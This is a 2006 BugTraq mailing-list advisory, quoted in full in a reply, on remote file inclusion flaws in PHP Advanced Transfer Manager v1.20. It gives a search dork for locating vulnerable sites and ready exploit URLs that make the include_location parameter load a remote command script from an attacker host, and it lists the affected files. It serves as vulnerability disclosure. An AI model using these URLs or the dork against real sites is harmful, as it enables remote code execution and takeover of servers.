BugTraq
Back to list
|
Post reply
PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
Sep 10 2006 05:19PM
l0x3 hotmail com
(1 replies)
+--------------------------------------------------------------------
+
+ PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: PHP Advanced Transfer Manager v1.20
+ Venedor ...........: http://phpatm.free.fr/
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Ex3cut1on)
+ Discovered by ..........: Eddy_BAck0o
+ Contact ...........: l0x3[at]hotmail.com ; www.LEzr.com/vB
+
+--------------------------------------------------------------------
+
+ This weakness in the security of a long Time ;
+ but I had not deployed before ;
+ and many of the sites included This weakness version ...
+ you can be sure for that by dork it
+ intext:\"Powered by PHP Advanced Transfer Manager v1.20"
+ Ex --> victom.com/[local]/anyfile:=)?include_location=http://www.yourev1l.com/r
0x.txt?cmd
+
+--------------------------------------------------------------------
+ ./index Directory ...
~ [Login.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 625
+ Ex --> http://www.victom.com/[path]/Login.php?include_location=http://www.youre
v1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [activate.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 121
+ Ex --> http://www.victom.com/[path]/activate.php?include_location=http://www.yo
urev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [configure.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 165
+ Ex --> http://www.victom.com/[path]/configure.php?include_location=http://www.y
ourev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ confirm.php < -------- 26 - 122
~ fileop.php < -------- 26 - 145
~ getimg.php < -------- 26 - 56
~ ipblocked.php < -------- 25 - 71
~ register.php < -------- 26 - 291
~ showrecent.php < -------- 26 - 275
~ showtophits.php < -------- 26 - 237
~ usrmanag.php < -------- 26 - 381
~ viewer_bottom.php < -------- 27 - 50
~ viewer_content.php < -------- 27 - 49
~ viewer_top.php < -------- 27 - 57
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ gr33tz 4ll ;LEzr.com/vB [ MoHaJaLi ] :P My best;
+ and all My the Team ;....
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ reply ]
Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
Sep 13 2006 10:46AM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
+
+ PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: PHP Advanced Transfer Manager v1.20
+ Venedor ...........: http://phpatm.free.fr/
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Ex3cut1on)
+ Discovered by ..........: Eddy_BAck0o
+ Contact ...........: l0x3[at]hotmail.com ; www.LEzr.com/vB
+
+--------------------------------------------------------------------
+
+ This weakness in the security of a long Time ;
+ but I had not deployed before ;
+ and many of the sites included This weakness version ...
+ you can be sure for that by dork it
+ intext:\"Powered by PHP Advanced Transfer Manager v1.20"
+ Ex --> victom.com/[local]/anyfile:=)?include_location=http://www.yourev1l.com/r
0x.txt?cmd
+
+--------------------------------------------------------------------
+ ./index Directory ...
~ [Login.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 625
+ Ex --> http://www.victom.com/[path]/Login.php?include_location=http://www.youre
v1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [activate.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 121
+ Ex --> http://www.victom.com/[path]/activate.php?include_location=http://www.yo
urev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [configure.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 165
+ Ex --> http://www.victom.com/[path]/configure.php?include_location=http://www.y
ourev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ confirm.php < -------- 26 - 122
~ fileop.php < -------- 26 - 145
~ getimg.php < -------- 26 - 56
~ ipblocked.php < -------- 25 - 71
~ register.php < -------- 26 - 291
~ showrecent.php < -------- 26 - 275
~ showtophits.php < -------- 26 - 237
~ usrmanag.php < -------- 26 - 381
~ viewer_bottom.php < -------- 27 - 50
~ viewer_content.php < -------- 27 - 49
~ viewer_top.php < -------- 27 - 57
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ gr33tz 4ll ;LEzr.com/vB [ MoHaJaLi ] :P My best;
+ and all My the Team ;....
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ reply ]